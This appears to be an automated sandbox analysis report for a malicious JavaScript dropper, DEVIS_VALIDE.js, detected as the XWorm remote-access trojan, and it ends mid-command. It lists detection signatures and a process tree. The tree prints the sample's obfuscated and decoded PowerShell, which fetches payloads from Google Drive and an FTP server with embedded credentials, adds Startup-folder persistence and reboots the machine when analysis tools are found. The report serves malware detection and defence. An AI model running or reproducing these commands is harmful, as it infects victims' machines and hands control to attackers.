Edit tour

Windows Analysis Report
DEVIS_VALIDE.js

Overview

General Information

Sample name:	DEVIS_VALIDE.js
Analysis ID:	1559259
MD5:	9feff1a23db299a128f16bc6091df793
SHA1:	2041542fb6ddc259c2888d587f75a06947d6c0dc
SHA256:	67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9
Tags:	jsuser-nawhack
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Sigma detected: Copy file to startup via Powershell

Sigma detected: Paste sharing url in reverse order

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Potential dropper URLs found in powershell memory

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Self deletion via cmd or bat file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell DownloadFile

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Tries to harvest and steal browser information (history, passwords, etc)

Uses dynamic DNS services

Uses powershell cmdlets to delay payload execution

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7136 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 6308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAHQAcA' + [char]66 + 'XAGsARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAdA' + [char]66 + 'wAFcAaw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAag' + [char]66 + 'sAGMAcQ' + [char]66 + 'qACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAE8Aag' + [char]66 + 'yAFIAUAAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAE8Aag' + [char]66 + 'yAFIAUAAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'qAGwAYw' + [char]66 + 'xAGoAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASQ' + [char]66 + 'lAHAARw' + [char]66 + 'RACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAEYAeQ' + [char]66 + 'mAGQAegAgACkALgAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJwAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACcAIAApAC4ARw' + [char]66 + 'lAHQATQAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACAAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACAALAAgAFsAbw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAWw' + [char]66 + 'dAF0AIAAoACAAJwAnAGsANw' + [char]66 + 'OAG4ATQ' + [char]66 + 'DAFAAQwAvAHcAYQ' + [char]66 + 'yAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'uAGkAYg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'EAEMAUA' + [char]66 + 'KAFUAJQAnACcAIAAsACAAIAAnACcARAAgAEQARA' + [char]66 + 'SAGUAZw' + [char]66 + '' + [char]66 + 'AHMAbQAnACcAIAAgACkAIAApADsAJwA7ACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAOw' + [char]66 + '9ADsA';$jPhaA = $jPhaA.replace('?','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\user\Desktop\DEVIS_VALIDE.js') ;powershell $jPhaA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = 